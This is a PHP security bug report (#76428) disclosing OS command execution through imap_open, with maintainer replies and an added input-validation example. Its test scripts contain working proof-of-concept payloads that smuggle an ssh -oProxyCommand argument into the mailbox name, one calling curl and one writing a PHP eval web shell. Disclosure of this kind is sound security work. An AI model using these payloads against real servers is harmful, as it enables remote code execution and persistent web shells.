Sec Bug #76428 Command execution through imap_open
Submitted: 2018-06-08 01:03 UTC Modified: 2018-11-20 19:37 UTC
From: c dot r dot l dot f at yandex dot ru Assigned:
Status: Duplicate Package: IMAP related
PHP Version: 7.0.30 OS: Debian Linux
Private report: No CVE-ID: None
 [2018-06-08 01:03 UTC] c dot r dot l dot f at yandex dot ru
Description:
------------
Hello.

Some PHP CMSs/CRMs use the IMAP package in their features. I encountered such functionality in my research and found the ability to execute OS commands through the imap_open function, which can be exploited remotely or locally to bypass disabled_functions and open_basedir.

The test was conducted on a fresh "Debian 9" with "PHP 7.0.27", but most likely that is not important, because I think there are some problems in "libc-client" and this may affect other distros.

For some reason "libc-client" uses "/usr/bin/rsh" to check(?) the connection to a given hostname and adds additional arguments if a space char is present in the given mailbox. Then all arguments go to the "execve" call.

In Debian-based distros "rsh" is a link to "ssh", so the "-oProxyCommand" option can be used for command execution and "-E" for file write.

Test script:
---------------
Remote:
<?php
//File write:
//<?=eval('eval('.strtoupper('$_REQUEST').'["x"]);');?> -E shell.php}
//
//RCE:
//server=x -oProxyCommand="`curl$IFS''localhost?PWN`"}&login=1&password=1

imap_open('{'.$_POST['server'].':993/imap/ssl}INBOX', $_POST['login'], $_POST['password']);
?>

Local:

<?php
file_put_contents('x','touch /tmp/PWN');
chmod('x', 0755);
imap_open('{x -oProxyCommand="`bash$IFS\'\'x`"}', 0, 0);
unlink('x');
?>

Expected result:
----------------
Connection error

Actual result:
--------------
Unexpected OS command execution
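As an added defensive example (not code from the report or from PHP itself): the report shows that the danger lies in whitespace and option-like tokens inside the {...} mailbox block, so an application that lets a request choose the IMAP server should validate that value before building the imap_open() spec. The function names validate_imap_host and safe_imap_open and the optional allow-list are assumed names for this illustration.

```php
<?php
// Added example, not part of the bug report: validate an untrusted
// server name before it is interpolated into the imap_open() mailbox
// spec. libc-client splits whitespace inside {...} into extra rsh/ssh
// arguments, so a plain hostname is all we accept.

/**
 * Return the validated host or throw.
 * $allowedHosts is a hypothetical allow-list; an empty list means
 * "any syntactically valid hostname is accepted".
 */
function validate_imap_host(string $server, array $allowedHosts = []): string
{
    // DNS labels only: letters, digits, dots, hyphens; must start and
    // end alphanumerically, so no whitespace, braces, quotes, or a
    // leading "-" that ssh would read as an option.
    if (!preg_match('/^[A-Za-z0-9](?:[A-Za-z0-9.-]{0,252}[A-Za-z0-9])?$/', $server)) {
        throw new InvalidArgumentException('invalid IMAP host');
    }
    if ($allowedHosts !== []
        && !in_array(strtolower($server), array_map('strtolower', $allowedHosts), true)) {
        throw new InvalidArgumentException('IMAP host not in allow-list');
    }
    return $server;
}

function safe_imap_open(string $server, string $user, string $pass, array $allowedHosts = [])
{
    $host = validate_imap_host($server, $allowedHosts);
    // Port and protocol flags are fixed by the application, never taken
    // from the request, so the only variable part is the validated host.
    $spec = '{' . $host . ':993/imap/ssl}INBOX';
    return imap_open($spec, $user, $pass, 0, 0);
}

// Constructed inputs: a normal hostname, and the payload shape from the report.
foreach (['imap.example.com', 'x -oProxyCommand=y'] as $candidate) {
    try {
        validate_imap_host($candidate);
        echo "accepted: $candidate\n";
    } catch (InvalidArgumentException $e) {
        echo "rejected: $candidate ({$e->getMessage()})\n";
    }
}
```

Later PHP releases also ship the imap.enable_insecure_rsh INI setting, off by default, which stops libc-client from invoking rsh/ssh at all; input validation like the above remains worthwhile as defence in depth on older builds.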

History

 [2018-06-20 04:31 UTC] stas@php.net
If libc-client indeed uses shell on mailbox name without filtering, that bug should be reported to libc-client maintainers. I am not sure what PHP could do here if the offending code is inside libc-client.
 [2018-06-20 04:31 UTC] stas@php.net
-Status: Open +Status: Suspended
 [2018-06-20 15:23 UTC] c dot r dot l dot f at yandex dot ru
Since the package uses third-party code, I think that you must indicate that unfiltered user data can lead to unpredictable consequences and you have nothing to do with it :)
 [2018-11-20 19:36 UTC] stas@php.net
-Status: Suspended +Status: Duplicate
 [2018-11-20 19:36 UTC] stas@php.net
See bug #76428
 [2018-11-20 19:37 UTC] stas@php.net
Oops I meant bug #77153
 
PHP Copyright © 2001-2024 The PHP Group
All rights reserved.
Last updated: Thu Dec 12 18:01:26 2024 UTC